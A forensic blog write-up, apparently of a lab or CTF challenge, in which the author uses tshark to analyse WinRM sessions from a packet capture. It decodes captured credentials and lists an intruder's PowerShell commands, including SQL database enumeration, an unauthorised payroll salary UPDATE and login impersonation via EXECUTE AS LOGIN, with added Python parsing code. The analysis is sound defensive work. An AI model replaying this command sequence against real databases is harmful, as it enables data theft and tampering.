<span style="color: white;"> tcp.segments frames:187 bytes:76189</span>
<span style="color: white;">===================================================================</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the date and time of this session from the local time perspective.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 5_49704-4_5985.pcapng -t ad | more </span>
<span><span style="color: white;"> 1 </span><b><span style="color: #fcff01;">2023-07-23 19:13:04.820382</span></b><span style="color: white;"> 10.240.240.5 → 10.240.240.4 TCP 66 49704 → 5985 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM</span></span>
</pre></div>
</div><div><br /></div><div><div>Looking at the time in UTC</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 5_49704-4_5985.pcapng -t ud | more </span>
<span style="color: white;"> 1 </span><span style="color: #fcff01;"><b>2023-07-23 23:13:04.820382</b></span><span style="color: white;"> 10.240.240.5 → 10.240.240.4 TCP 66 49704 → 5985 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM</span>
</pre></div>
</div><div><br /></div><div><div>The session with the <i>log.txt</i> ended around 23:12 UTC. This session is starting at 23:13 UTC. This means it started just after the other ended.</div><div><br /></div><div>From the protocol hierarchy, we see HTTP. If there is HTTP then we should see some methods, etc.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 5_49704-4_5985.pcapng -t ud -T fields -e http.request.method | sort | uniq --count </span>
<span style="color: white;"> 673 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">95 POST</span></b></span>
</pre></div>
</div><div><br /></div><div><div>95 POSTs. Ok, let's see what is going on here. Looking at two of these POST messages, we see:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 5_49704-4_5985.pcapng -t ud -Y 'http.request.method==POST'</span>
<span><span style="color: white;"> 10 2023-07-23 23:13:04.821860 10.240.240.5 → 10.240.240.4 HTTP/XML 664 </span><b><span style="color: #fcff01;">POST /wsman?PSVersion=5.1.22621.1778</span></b><span style="color: white;"> HTTP/1.1 </span></span>
<span><span style="color: white;"> 19 2023-07-23 23:13:05.281275 10.240.240.5 → 10.240.240.4 HTTP/XML 721 </span><b><span style="color: #fcff01;">POST /wsman?PSVersion=5.1.22621.1778</span></b><span style="color: white;"> HTTP/1.1 </span></span>
</pre></div>
</div><div><br /></div><div><div>Expanding Frame 10, to see what else we can learn, we see "<i>Microsoft WinRM Client</i>" and "<i>PS Remoting version 5.1</i>" being used to connect from <i>10.240.240.5</i> to <i>10.240.240.4</i>. If we pay close attention below, we see the base64 credentials have been decoded by TShark, hence we have the credentials "<i>littlenewman:password</i>" being used to connect to a Windows device. </div></div><div><br /></div><div>Evidence in the log analysis shows this account <i>littlenewman </i>with password <i>password </i>was created as a result of the <i>Win11Updates.exe</i> file, which was executed on Jerry-PC.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 5_49704-4_5985.pcapng -t ud -Y 'frame.number==10' -V | sed '1,96d;121,$d' </span>
<span style="color: white;">Hypertext Transfer Protocol</span>
<span style="color: white;"> POST /wsman?PSVersion=5.1.22621.1778 HTTP/1.1\r\n</span>
<span style="color: white;"> [Expert Info (Chat/Sequence): POST /wsman?PSVersion=5.1.22621.1778 HTTP/1.1\r\n]</span>
<span style="color: white;"> [POST /wsman?PSVersion=5.1.22621.1778 HTTP/1.1\r\n]</span>
<span style="color: white;"> [Severity level: Chat]</span>
<span style="color: white;"> [Group: Sequence]</span>
<span style="color: white;"> Request Method: POST</span>
<span style="color: white;"> Request URI: /wsman?PSVersion=5.1.22621.1778</span>
<span style="color: white;"> Request URI Path: /wsman</span>
<span style="color: white;"> Request URI Query: PSVersion=5.1.22621.1778</span>
<span style="color: white;"> Request URI Query Parameter: PSVersion=5.1.22621.1778</span>
<span style="color: white;"> Request Version: HTTP/1.1</span>
<span style="color: white;"> Connection: Keep-Alive\r\n</span>
<span style="color: white;"> Content-Type: application/soap+xml;charset=UTF-8\r\n</span>
<span style="color: white;"> User-Agent: Microsoft WinRM Client\r\n</span>
<span style="color: white;"> Content-Length: 7910\r\n</span>
<span style="color: white;"> [Content length: 7910]</span>
<span style="color: white;"> Host: 10.240.240.4:5985\r\n</span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">Authorization: Basic bGl0dGxlbmV3bWFuOnBhc3N3b3Jk\r\n</span></b></span><b><span style="color: #fcff01;">
<span> Credentials: littlenewman:password</span></span></b>
<span style="color: white;"> \r\n</span>
<span style="color: white;"> [Full request URI: http://10.240.240.4:5985/wsman?PSVersion=5.1.22621.1778]</span>
<span style="color: white;"> [HTTP request 1/1]</span>
<span style="color: white;"> File Data: 7910 bytes</span>
</pre></div>
</div><div><br /></div><div><div>With 7910 bytes, it is only fair that we look into this to see what is there. Looking at the data from the perspective of YAML.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">$ tshark -n -r 5_49704-4_5985.pcapng -t ud -q </span><b><span style="color: #fcff01;">-z follow,tcp,yaml,0</span></b><span style="color: white;"> | more</span></span>
<span style="color: white;">peers:</span>
<span style="color: white;"> - peer: 0</span>
<span style="color: white;"> host: 10.240.240.5</span>
<span style="color: white;"> port: 49704</span>
<span style="color: white;"> - peer: 1</span>
<span style="color: white;"> host: 10.240.240.4</span>
<span style="color: white;"> port: 5985</span>
<span style="color: white;">packets:</span>
<span style="color: white;"> - packet: 4</span>
<span style="color: white;"> peer: 0</span>
<span style="color: white;"> timestamp: 1690153984.821707964</span>
<span style="color: white;"> data: !!binary |</span>
<span style="color: white;"> UE9TVCAvd3NtYW4/UFNWZXJzaW9uPTUuMS4yMjYyMS4xNzc4IEhUVFAvMS4xDQpDb25uZWN0aW9u</span>
<span style="color: white;"> OiBLZWVwLUFsaXZlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3NvYXAreG1sO2NoYXJzZXQ9</span>
<span style="color: white;"> VVRGLTgNClVzZXItQWdlbnQ6IE1pY3Jvc29mdCBXaW5STSBDbGllbnQNCkNvbnRlbnQtTGVuZ3Ro</span>
<span style="color: white;"> OiA3OTEwDQpIb3N0OiAxMC4yNDAuMjQwLjQ6NTk4NQ0KQXV0aG9yaXphdGlvbjogQmFzaWMgYkds</span>
<span style="color: white;"> MGRHeGxibVYzYldGdU9uQmhjM04zYjNKaw0KDQo=</span>
<span style="color: white;"> - packet: 5</span>
<span style="color: white;"> peer: 0</span>
<span style="color: white;"> timestamp: 1690153984.821860075</span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">data: !!binary |</span></b></span><b><span style="color: #fcff01;">
<span> PHM6RW52ZWxvcGUgeG1sbnM6cz0iaHR0cDovL3d3dy53My5vcmcvMjAwMy8wNS9zb2FwLWVudmVs</span>
<span> b3BlIiB4bWxuczphPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA0LzA4L2FkZHJl</span>
<span> c3NpbmciIHhtbG5zOnc9Imh0dHA6Ly9zY2hlbWFzLmRtdGYub3JnL3diZW0vd3NtYW4vMS93c21h</span>
<span> bi54c2QiIHhtbG5zOnA9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2JlbS93c21hbi8x</span>
<span> L3dzbWFuLnhzZCI+PHM6SGVhZGVyPjxhOlRvPmh0dHA6Ly8xMC4yNDAuMjQwLjQ6NTk4NS93c21h</span>
<span> bj9QU1ZlcnNpb249NS4xLjIyNjIxLjE3Nzg8L2E6VG8+PHc6UmVzb3VyY2VVUkkgczptdXN0VW5k</span>
<span> ZXJzdGFuZD0idHJ1ZSI+aHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9wb3dlcnNoZWxsL01p</span>
<span> Y3Jvc29mdC5Qb3dlclNoZWxsPC93OlJlc291cmNlVVJJPjxhOlJlcGx5VG8+PGE6QWRkcmVzcyBz</span>
<span> Om11c3RVbmRlcnN0YW5kPSJ0cnVlIj5odHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA0</span>
<span> LzA4L2FkZHJlc3Npbmcvcm9sZS9hbm9ueW1vdXM8L2E6QWRkcmVzcz48L2E6UmVwbHlUbz48YTpB</span>
<span> Y3Rpb24gczptdXN0VW5kZXJzdGFuZD0idHJ1ZSI+aHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcv</span>
<span> d3MvMjAwNC8wOS90cmFuc2Zlci9DcmVhdGU8L2E6QWN0aW9uPjx3Ok1heEVudmVsb3BlU2l6ZSBz</span>
<span> Om11c3RVbmRlcnN0YW5kPSJ0cnVlIj41MTIwMDA8L3c6TWF4RW52ZWxvcGVTaXplPjxhOk1lc3Nh</span>
<span> Z2VJRD51dWlkOjM2QjQwNzg4LUVBM0MtNDIyRC1BOTY1LTc1NUQ2RDhCMkJDNzwvYTpNZXNzYWdl</span>
<span> SUQ+PHc6TG9jYWxlIHhtbDpsYW5nPSJlbi1VUyIgczptdXN0VW5kZXJzdGFuZD0iZmFsc2UiIC8+</span>
<span> PHA6RGF0YUxvY2FsZSB4bWw6bGFuZz0iZW4tVVMiIHM6bXVzdFVuZGVyc3RhbmQ9ImZhbHNlIiAv</span>
<span> PjxwOlNlc3Npb25JZCBzOm11c3RVbmRlcnN0YW5kPSJmYWxzZSI+dXVpZDowN0UwMUREMC05RDA5</span>
<span> LTQ0REYtQTAxNy00NERGRUQxNzlDNTA8L3A6U2Vzc2lvbklkPjxwOk9wZXJhdGlvbklEIHM6bXVz</span>
<span> dFVuZGVyc3RhbmQ9ImZhbHNlIj51dWlkOkY5QzIyRTAxLTFBRkItNDNDNy04QzdCLTAxRjRENDk0</span>
<span> RTYzRTwvcDpPcGVyYXRpb25JRD48cDpTZXF1ZW5jZUlkIHM6bXVzdFVuZGVyc3RhbmQ9ImZhbHNl</span>
<span> Ij4xPC9wOlNlcXVlbmNlSWQ+PHc6T3B0aW9uU2V0IHhtbG5zOnhzaT0iaHR0cDovL3d3dy53My5v</span>
<span> cmcvMjAwMS9YTUxTY2hlbWEtaW5zdGFuY2UiIHM6bXVzdFVuZGVyc3RhbmQ9InRydWUiPjx3Ok9w</span>
<span> dGlvbiBOYW1lPSJwcm90b2NvbHZlcnNpb24iIE11c3RDb21wbHk9InRydWUiPjIuMzwvdzpPcHRp</span>
<span> b24+PC93Ok9wdGlvblNldD48dzpPcGVyYXRpb25UaW1lb3V0PlBUMTgwLjAwMFM8L3c6T3BlcmF0</span>
<span> aW9uVGltZW91dD48cnNwOkNvbXByZXNzaW9uVHlwZSBzOm11c3RVbmRlcnN0YW5kPSJ0cnVlIiB4</span>
<span> bWxuczpyc3A9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC4=</span></span></b>
</pre></div>
</div><div><br /></div><div><div>What we want is the data from above. Here is how we can get that using<i> yq</i>.</div></div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>$ tshark -n -r 5_49704-4_5985.pcapng -t ud -q -z follow,tcp,yaml,0 | \</span></span></pre><pre style="line-height: 125%; margin: 0px;"><span><span><span style="color: #fcff01;"><b>yq -e ".packets[0].data" </b></span><span style="color: white;">| cut --fields 2 --delimiter '"' | sed 's/\\n//g' | \</span></span></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>base64 --decode</span></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">
<span style="font-weight: bold;">POST</span> <span>/wsman?PSVersion=5.1.22621.1778</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>Keep-Alive</span>
<span style="font-weight: bold;">Content-Type</span><span>:</span> <span>application/soap+xml;charset=UTF-8</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Microsoft WinRM Client</span>
<span style="font-weight: bold;">Content-Length</span><span>:</span> <span>7910</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.240.240.4:5985</span>
<span style="font-weight: bold;">Authorization</span><span>:</span> <span>Basic bGl0dGxlbmV3bWFuOnBhc3N3b3Jk</span></span>
</pre></div>
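The yq pipeline above pulls one packet's <code>data</code> field. The script below is an added example, not the author's code: it parses the whole <code>follow,tcp,yaml</code> output without a YAML library, joins each peer's chunks in packet order, splits the client direction into HTTP bodies by Content-Length, and extracts the WS-Man <code>&lt;rsp:Command&gt;</code> elements that the later WinRM sessions in this write-up carry, decoding XML entities such as <code>&amp;quot;</code> instead of stripping them. Because the direction is joined before matching, a command split across two TCP segments comes back whole. The follow output is constructed here from sample envelopes rather than captured traffic, and the envelope layout and <code>rsp</code> namespace are assumptions modelled on the WS-Man shell schema.

```python
import base64
import html
import re
from typing import Dict, List, Tuple

RSP_COMMAND = re.compile(r"<rsp:Command>(.*?)</rsp:Command>", re.DOTALL)

def parse_follow_yaml(text: str) -> Dict[int, bytes]:
    """Return {peer: payload bytes} from `tshark -q -z follow,tcp,yaml,N` output; only the
    YAML subset tshark emits (`packets:` entries with `peer:` and `data: !!binary |`) is
    handled, so no YAML library is needed; chunks are appended in packet order."""
    streams: Dict[int, bytearray] = {}
    peer, b64, in_data = None, [], False

    def flush() -> None:
        nonlocal b64, in_data
        if peer is not None and b64:
            streams.setdefault(peer, bytearray()).extend(base64.b64decode("".join(b64)))
        b64, in_data = [], False

    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("- packet:"):
            flush()
            peer = None
        elif line.startswith("peer:") and not in_data:  # `- peer:` under peers: is skipped
            peer = int(line.split(":", 1)[1])
        elif line.startswith("data: !!binary |"):
            in_data = True
        elif in_data and line:
            b64.append(line)
    flush()
    return {p: bytes(b) for p, b in streams.items()}

def http_bodies(stream: bytes) -> List[bytes]:
    """Split one direction of HTTP/1.1 into bodies using Content-Length (WinRM posts
    fixed-length SOAP bodies; chunked transfer encoding is not handled here)."""
    bodies, pos = [], 0
    while (end := stream.find(b"\r\n\r\n", pos)) >= 0:
        headers = stream[pos:end].decode("latin-1")
        match = re.search(r"(?im)^Content-Length:\s*(\d+)\s*$", headers)
        length = int(match.group(1)) if match else 0
        bodies.append(stream[end + 4:end + 4 + length])
        pos = end + 4 + length
    return bodies

def winrm_commands(client_stream: bytes) -> List[str]:
    """Every <rsp:Command> the client sent, with XML entities decoded. The direction
    is joined before matching, so a command straddling two TCP segments stays whole."""
    found: List[str] = []
    for body in http_bodies(client_stream):
        for m in RSP_COMMAND.finditer(body.decode("utf-8", errors="replace")):
            found.append(html.unescape(m.group(1)))
    return found

def commands_from_follow_yaml(text: str, client_peer: int = 0) -> List[str]:
    return winrm_commands(parse_follow_yaml(text).get(client_peer, b""))

# ---- constructed sample (not captured traffic): two client POSTs, one split -----
SAMPLE_COMMANDS = [
    "whoami",
    'Invoke-Sqlcmd -ConnectionString $ConnectionString -Query "SELECT SUSER_SNAME()"',
]

def _soap(command: str) -> bytes:
    # Envelope layout and rsp namespace are assumptions modelled on the WS-Man shell schema.
    return ('<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" '
            'xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell">'
            "<s:Body><rsp:CommandLine><rsp:Command>" + html.escape(command, quote=True) +
            "</rsp:Command></rsp:CommandLine></s:Body></s:Envelope>").encode()

def _post(body: bytes) -> bytes:
    return (b"POST /wsman?PSVersion=5.1.22621.1778 HTTP/1.1\r\n"
            b"Content-Type: application/soap+xml;charset=UTF-8\r\n"
            b"User-Agent: Microsoft WinRM Client\r\nHost: 10.240.240.4:5985\r\n"
            b"Content-Length: %d\r\n\r\n" % len(body))

def render_follow_yaml(peers: List[Tuple[str, int]], packets: List[Tuple[int, str, bytes]]) -> str:
    """Lay packets out the way `follow,tcp,yaml` prints them (76-column base64)."""
    out = ["peers:"]
    for i, (host, port) in enumerate(peers):
        out += [f"  - peer: {i}", f"    host: {host}", f"    port: {port}"]
    out.append("packets:")
    for n, (peer, ts, data) in enumerate(packets, start=1):
        b64 = base64.b64encode(data).decode()
        out += [f"  - packet: {n}", f"    peer: {peer}", f"    timestamp: {ts}", "    data: !!binary |"]
        out += ["      " + b64[i:i + 76] for i in range(0, len(b64), 76)]
    return "\n".join(out) + "\n"

def build_sample_follow_yaml() -> str:
    first, second = _soap(SAMPLE_COMMANDS[0]), _soap(SAMPLE_COMMANDS[1])
    packets = [
        (0, "1690153985.285031000", _post(first)),
        (0, "1690153985.285200000", first),
        (1, "1690153985.290000000", b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"),
        (0, "1690153985.300000000", _post(second) + second[:40]),  # envelope split mid-way
        (0, "1690153985.300100000", second[40:]),
    ]
    return render_follow_yaml([("10.240.240.5", 49706), ("10.240.240.4", 5985)], packets)
```

Run <code>commands_from_follow_yaml(open("follow.yaml").read())</code> on real tshark output saved to a file; peer 0 is the side that opened the connection.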
</div><div><br /></div><div><div>After reviewing this session from the client perspective, nothing meaningful was found from either the client or the server side of the connection.</div><div><br /></div><div>Trying another session as there were three WinRM sessions.</div><div><br /></div><div>Looking at: 10.240.240.5:49706 <-> 10.240.240.4:5985 </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 5-4.pcap -Y '(ip.addr==10.240.240.5) && (tcp.port==49706) && (ip.addr==10.240.240.4) && (tcp.port==5985)' -w 5_49706-4_5985.pcapng</span>
</pre></div>
</div><div><br /></div><div><div>When did this session start?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -r 5_49706-4_5985.pcapng -t ud -c 1</span>
<span style="color: white;"> 1 </span><span style="color: #fcff01;"><b>2023-07-23 23:13:05.285031</b></span><span style="color: white;"> 10.240.240.5 → 10.240.240.4 TCP 66 49706 → 5985 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM</span>
</pre></div>
</div><div><br /></div><div><div>This session is definitely more interesting than the first. Here are the commands which were run. Below I placed comments to better understand the commands.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -r 5_49706-4_5985.pcapng -q -z follow,tcp,ascii,0 | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">grep --perl-regexp '<rsp:Command>.*?<' --color=always --only-matching | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">awk --field-separator='<rsp:Command>' '{ print $2 }' | tr --delete '<' | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sed 's/&quot;//g' | sed 's/prompt//g' | sed 's/&apos;//g'</span>
</pre></div></div><div><div><i><br /></i></div><div><i>whoami</i></div><div>Comment: Identifies the currently logged in user</div><div><br /></div><div><i>hostname</i></div><div>Comment: Identifies the hostname of the computing device</div><div><br /></div><div><i>Set-ExecutionPolicy</i></div><div>Comment: I was expecting here to see the policy being set specifically, however, I don't see that here. Fortunately, this was identified in the log analysis section.</div><div><br /></div><div><i>Import-Module</i></div><div>Comment: Similarly, I expected to see some module being imported. </div><div><br /></div><div><i>$ConnectionString = Server=10.240.240.6;User=JerrySQL;Password=SecurePassword1337;TrustServerCertificate=True</i></div><div>Comment: Setting up a connection string to authenticate to the SQL Server at 10.240.240.6.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query SELECT SUSER_SNAME()</i></div><div>Comment: Querying the login name of the current security context. I would expect this is just confirmation of JerrySQL.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query SELECT name, SUSER_SNAME(owner_sid) AS DatabaseOwner FROM sys.databases;</i></div><div>Comment: List all databases and get the owner information.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query USE Seinfeld_Customers; SELECT name AS TableName FROM sys.tables;</i></div><div>Comment: Using the <i>Seinfeld_Customers </i>database, select the names of all tables from <i>sys.tables</i>. 
</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query USE Seinfeld_Employees; SELECT name AS TableName FROM sys.tables;</i></div><div>Comment: Using the <i>Seinfeld_Employees</i> database, select the names of all tables from <i>sys.tables</i>.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query USE Seinfeld_Employees; SELECT a.name AS UserName, b.name AS RoleName FROM sys.database_role_members drm JOIN sys.database_principals a ON drm.member_principal_id = a.principal_id JOIN sys.database</i></div><div>Comment: Run a query to extract information about roles and principal_id. </div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query USE Seinfeld_Employees; SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = Data;</i></div><div>Comment: Extract information about the fields/columns from the Data table.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query USE Seinfeld_Employees; SELECT id, Name, Position from Data;</i></div><div>Comment: Extract information on employees ID, Name and Position from the Data table.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query USE Seinfeld_Employees; SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = Payroll;</i></div><div>Comment: Grab information about the Payroll table columns in the Seinfeld_Employees database.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query USE Seinfeld_Employees; SELECT id, Salary from Payroll;</i></div><div>Comment: Select only the id, Salary fields from the Payroll table.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query USE Seinfeld_Employees; SELECT a.Name, b.Salary FROM Data a LEFT JOIN Payroll b ON b.id = a.id;</i></div><div>Comment: Select information on employees name and salary from both the Data and Payroll 
tables.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query USE Seinfeld_Employees; UPDATE Payroll SET Salary = 123456 WHERE id = 5;</i></div><div>Comment: Wicked, I get to set my own salary? I envy Newman. At this point, the employee salary is updated?</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query USE Seinfeld_Employees; SELECT a.Name, b.Salary FROM Data a LEFT JOIN Payroll b ON b.id = a.id;</i></div><div>Comment: Validation that the update in salary was successful.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query SELECT name, type_desc FROM sys.server_principals WHERE type IN (S, U)</i></div><div>Comment: Querying the Server Principals. Looking at Microsoft's site, the <i>server_principals </i>type does not show "U". S=SQL Login.</div><div>If we instead look at the <i>database_principals</i>, we see "S = SQL user", "U = Windows user"</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query SELECT DISTINCT grantor.name AS GrantorName, grantee.name AS GranteeName FROM sys.server_permissions perm JOIN sys.server_principals grantor ON perm.grantor_principal_id = grantor.principal_id JOIN</i></div><div>Comment: Query information on permissions.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL SELECT SUSER_SNAME(); REVERT;</i></div><div>Comment: Attempt to log in as user GeorgeSQL, then validate that the security context matches GeorgeSQL. 
Once completed, revert back to JerrySQL as the login user.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; USE Seinfeld_Employees; SELECT u.name AS UserName, r.name AS RoleName FROM sys.database_role_members drm JOIN sys.database_principals u ON drm.member_principal_id = </i></div><div>Comment: Using <i>GeorgeSQL </i>on the <i>Seinfeld_Employees</i> database, query the usernames and roles.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; SELECT name as DatabaseName, SUSER_SNAME(owner_sid) AS DatabaseOwner, is_trustworthy_on AS TRUSTWORTHY from sys.databases; REVERT;</i></div><div>Comment: Select database owner information that <i>GeorgeSQL</i> can see. Also check, via the "<i>is_trustworthy_on</i>" attribute, whether SQL Server trusts the database and its contents.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query $Query </i></div><div>Comment: Hmmm! I can't remember seeing a $Query variable defined above. Is this an attempt to hide information on the previous queries? It looks so! Or did I miss something?!</div><div><br /></div><div>While the above only shows the commands and my interpretation of their objectives, I was unable to identify any response which could be decoded to reflect the response for these commands. Actually, I find this very strange. Maybe I just needed to pay closer attention to the output. In reality the response does not really matter much to me at this time, unless I'm concerned about confirmation of exfiltration. 
For now, I will consider not being able to detect the responses a minor setback.</div><div><br /></div></div><div><div>Writing the final WinRM session out to file for analysis.</div></div><div><br /></div><div>10.240.240.5:49705 <-> 10.240.240.4:5985</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 5-4.pcap -Y '(ip.addr==10.240.240.5) && (tcp.port==49705) && (ip.addr==10.240.240.4) && (tcp.port==5985)' -w 5_49705-4_5985.pcapng</span>
</pre></div>
</div><div><br /></div><div><div>What time did this activity start?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -r 5_49705-4_5985.pcapng -t ud -c 1</span>
<span><span style="color: white;"> 1 </span><b><span style="color: #fcff01;">2023-07-23 23:13:05.207334</span></b><span style="color: white;"> 10.240.240.5 → 10.240.240.4 TCP 66 49705 → 5985 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM</span></span>
</pre></div>
</div><div><br /></div><div><div>This started at 23:13:05 (UTC, per <i>-t ud</i>) on July 23, 2023. What are the commands which were run?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -r 5_49705-4_5985.pcapng -q -z follow,tcp,ascii,0 | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">grep --perl-regexp '<rsp:Command>.*?<' --color=always --only-matching | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">awk --field-separator='<rsp:Command>' '{ print $2 }' | tr --delete '<' | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sed 's/&quot;//g' | sed 's/prompt//g' | sed 's/&apos;//g'</span>
</pre></div>
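Before walking through the decoded commands, here is an added Python equivalent of the pipeline above (example code, not from this post or the challenge). It assumes plain WinRS-style shell traffic, where each request carries the command in <rsp:Command> and <rsp:Arguments> elements and the response carries stdout/stderr as base64 text inside <rsp:Stream Name="..."> elements; the SOAP fragment it parses is constructed for the example, not taken from the capture.

```python
"""Pull WinRM shell commands and their output out of a TCP stream dump
(for instance the text printed by `tshark -z follow,tcp,ascii,N`).

Added example, not part of the original post. Assumes WinRS-style shell
traffic: commands in <rsp:Command>/<rsp:Arguments>, output base64-encoded
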